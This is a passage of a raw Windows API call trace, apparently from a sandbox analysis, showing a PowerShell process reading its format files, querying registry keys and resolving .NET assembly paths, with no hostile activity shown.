ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0089.748] GetLastError () returned 0x0 [0089.748] SetErrorMode (uMode=0x1) returned 0x1 [0089.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0089.748] GetLastError () returned 0x0 [0089.748] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e488 | out: phkResult=0x13e488*=0x324) returned 0x0 [0089.748] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x0, lpcbData=0x13e4cc*=0x0 | out: lpType=0x13e4d0*=0x1, lpData=0x0, lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.748] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x3953b0, lpcbData=0x13e4cc*=0x56 | out: lpType=0x13e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.748] RegCloseKey (hKey=0x324) returned 0x0 [0089.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0089.748] GetLastError () returned 0x0 [0089.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0089.749] GetLastError () returned 0x0 [0089.749] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xd86bd6c3, Data2=0xb521, Data3=0x4817, Data4=([0]=0x98, [1]=0x3b, [2]=0x1c, [3]=0x45, [4]=0xba, [5]=0xad, [6]=0x5a, [7]=0x4d))) returned 0x0 [0089.751] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xbbd67134, Data2=0xa257, Data3=0x4d40, Data4=([0]=0x96, [1]=0x50, [2]=0x4a, [3]=0x5c, [4]=0xb9, [5]=0xfc, [6]=0xd6, [7]=0xfd))) returned 0x0 [0089.752] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xac4602d4, Data2=0x80b0, Data3=0x4623, Data4=([0]=0xbc, [1]=0x8, [2]=0xd6, [3]=0x28, [4]=0xe, [5]=0x4e, [6]=0x8f, [7]=0xde))) returned 0x0 [0089.752] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xe0a1d828, Data2=0x2994, Data3=0x443b, Data4=([0]=0x9a, [1]=0x19, [2]=0xca, [3]=0x29, [4]=0x81, [5]=0x33, [6]=0xb7, [7]=0xad))) returned 0x0 [0089.753] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xd4585568, Data2=0xa148, Data3=0x4cf1, Data4=([0]=0x9b, [1]=0xb4, [2]=0xe1, [3]=0x4, [4]=0x37, [5]=0x3, [6]=0x23, [7]=0xd6))) returned 0x0 [0089.753] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x57c083d9, Data2=0x27a9, Data3=0x497f, Data4=([0]=0x8e, [1]=0xed, [2]=0xde, [3]=0x52, [4]=0x1a, [5]=0x28, [6]=0x29, [7]=0xa6))) returned 0x0 [0089.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.753] GetLastError () returned 0x0 [0089.753] SetErrorMode (uMode=0x1) returned 0x1 [0089.753] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0089.753] GetLastError () returned 0x0 [0089.753] GetFileType (hFile=0x324) returned 0x1 [0089.753] SetErrorMode (uMode=0x1) returned 0x1 [0089.753] GetFileType (hFile=0x324) returned 0x1 [0089.753] ReadFile (in: hFile=0x324, lpBuffer=0x3032298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x3032298*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.755] GetLastError () returned 0x0 [0089.755] ReadFile (in: hFile=0x324, lpBuffer=0x3032298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x3032298*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.755] GetLastError () returned 0x0 [0089.755] ReadFile (in: hFile=0x324, lpBuffer=0x3032298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x3032298*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.755] GetLastError () returned 0x0 [0089.755] ReadFile (in: hFile=0x324, lpBuffer=0x3032298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x3032298*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.755] GetLastError () returned 0x0 [0089.756] ReadFile (in: hFile=0x324, lpBuffer=0x3032298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x3032298*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.756] GetLastError () returned 0x0 [0089.756] ReadFile (in: hFile=0x324, lpBuffer=0x3032298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x3032298*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.756] GetLastError () returned 0x0 [0089.756] ReadFile (in: hFile=0x324, lpBuffer=0x3032298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x3032298*, lpNumberOfBytesRead=0x13e504*=0xaca, lpOverlapped=0x0) returned 1 [0089.756] GetLastError () returned 0x0 [0089.756] ReadFile (in: hFile=0x324, lpBuffer=0x3031902, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x3031902*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.756] GetLastError () returned 0x0 [0089.756] ReadFile (in: hFile=0x324, lpBuffer=0x3032298, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x3032298*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.756] GetLastError () returned 0x0 [0089.756] CloseHandle (hObject=0x324) returned 1 [0089.756] GetLastError () returned 0x0 [0089.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.756] GetLastError () returned 0x0 [0089.756] SetErrorMode (uMode=0x1) returned 0x1 [0089.756] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3053294 | out: lpFileInformation=0x3053294*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0089.756] GetLastError () returned 0x0 [0089.756] SetErrorMode (uMode=0x1) returned 0x1 [0089.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.756] GetLastError () returned 0x0 [0089.757] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e488 | out: phkResult=0x13e488*=0x324) returned 0x0 [0089.757] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x0, lpcbData=0x13e4cc*=0x0 | out: lpType=0x13e4d0*=0x1, lpData=0x0, lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.757] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x3953b0, lpcbData=0x13e4cc*=0x56 | out: lpType=0x13e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.757] RegCloseKey (hKey=0x324) returned 0x0 [0089.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.757] GetLastError () returned 0x0 [0089.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0089.758] GetLastError () returned 0x0 [0089.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.758] GetLastError () returned 0x57 [0089.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0089.764] GetLastError () returned 0x57 [0089.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.767] GetLastError () returned 0x57 [0089.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0089.768] GetLastError () returned 0x57 [0089.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0089.769] GetLastError () returned 0x57 [0089.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0089.770] GetLastError () returned 0x57 [0089.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0089.770] GetLastError () returned 0x57 [0089.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0089.771] GetLastError () returned 0x57 [0089.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0089.771] GetLastError () returned 0x57 [0089.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0089.772] GetLastError () returned 0x57 [0089.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0089.773] GetLastError () returned 0x57 [0089.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0089.773] GetLastError () returned 0x57 [0089.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0089.773] GetLastError () returned 0x57 [0089.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0089.774] GetLastError () returned 0x57 [0089.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0089.775] GetLastError () returned 0x57 [0089.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.775] GetLastError () returned 0x57 [0089.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0089.775] GetLastError () returned 0x57 [0089.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.775] GetLastError () returned 0x57 [0089.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.776] GetLastError () returned 0x57 [0089.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.776] GetLastError () returned 0x57 [0089.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.776] GetLastError () returned 0x57 [0089.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.776] GetLastError () returned 0x57 [0089.783] VirtualQuery (in: lpAddress=0x13d1e0, lpBuffer=0x13e1e0, dwLength=0x1c | out: lpBuffer=0x13e1e0*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.785] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x4efeb8ff, Data2=0x85a2, Data3=0x4e73, Data4=([0]=0xac, [1]=0x84, [2]=0x6c, [3]=0x9c, [4]=0x1a, [5]=0x6a, [6]=0xde, [7]=0x37))) returned 0x0 [0089.785] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x180e7264, Data2=0xd154, Data3=0x4eee, Data4=([0]=0x86, [1]=0x4, [2]=0x5a, [3]=0x93, [4]=0xf2, [5]=0x1b, [6]=0xa2, [7]=0x8d))) returned 0x0 [0089.786] VirtualQuery (in: lpAddress=0x13d258, lpBuffer=0x13e258, dwLength=0x1c | out: lpBuffer=0x13e258*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.786] VirtualQuery (in: lpAddress=0x13d258, lpBuffer=0x13e258, dwLength=0x1c | out: lpBuffer=0x13e258*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.786] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x46b6eec8, Data2=0x8fc9, Data3=0x4a0c, Data4=([0]=0x95, [1]=0x6c, [2]=0x68, [3]=0xbc, [4]=0x45, [5]=0x6c, [6]=0x65, [7]=0xf5))) returned 0x0 [0089.789] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xe70fa157, Data2=0x40d5, Data3=0x4169, Data4=([0]=0xad, [1]=0xc1, [2]=0xd, [3]=0x2e, [4]=0x73, [5]=0x1, [6]=0x2b, [7]=0x20))) returned 0x0 [0089.789] VirtualQuery (in: lpAddress=0x13d384, lpBuffer=0x13e384, dwLength=0x1c | out: lpBuffer=0x13e384*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.790] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.790] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.790] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xee497778, Data2=0x560, Data3=0x4d80, Data4=([0]=0xad, [1]=0x9e, [2]=0xa7, [3]=0x24, [4]=0xc8, [5]=0xbd, [6]=0xa7, [7]=0xd0))) returned 0x0 [0089.790] VirtualQuery (in: lpAddress=0x13d384, lpBuffer=0x13e384, dwLength=0x1c | out: lpBuffer=0x13e384*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.791] VirtualQuery (in: lpAddress=0x13d29c, lpBuffer=0x13e29c, dwLength=0x1c | out: lpBuffer=0x13e29c*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.792] VirtualQuery (in: lpAddress=0x13cf50, lpBuffer=0x13df50, dwLength=0x1c | out: lpBuffer=0x13df50*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.793] VirtualQuery (in: lpAddress=0x13cf50, lpBuffer=0x13df50, dwLength=0x1c | out: lpBuffer=0x13df50*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.793] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xb59b65ba, Data2=0xfba, Data3=0x4140, Data4=([0]=0x86, [1]=0x52, [2]=0x33, [3]=0x1b, [4]=0xfe, [5]=0x4, [6]=0xf5, [7]=0xfe))) returned 0x0 [0089.793] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x37bbb48b, Data2=0x321a, Data3=0x4b16, Data4=([0]=0x90, [1]=0x2c, [2]=0xcb, [3]=0x44, [4]=0xf5, [5]=0xd3, [6]=0xc0, [7]=0x5b))) returned 0x0 [0089.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.793] GetLastError () returned 0x57 [0089.793] SetErrorMode (uMode=0x1) returned 0x1 [0089.793] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0089.793] GetLastError () returned 0x0 [0089.793] GetFileType (hFile=0x324) returned 0x1 [0089.793] SetErrorMode (uMode=0x1) returned 0x1 [0089.793] GetFileType (hFile=0x324) returned 0x1 [0089.793] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.794] GetLastError () returned 0x0 [0089.795] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.795] GetLastError () returned 0x0 [0089.795] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.795] GetLastError () returned 0x0 [0089.796] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, 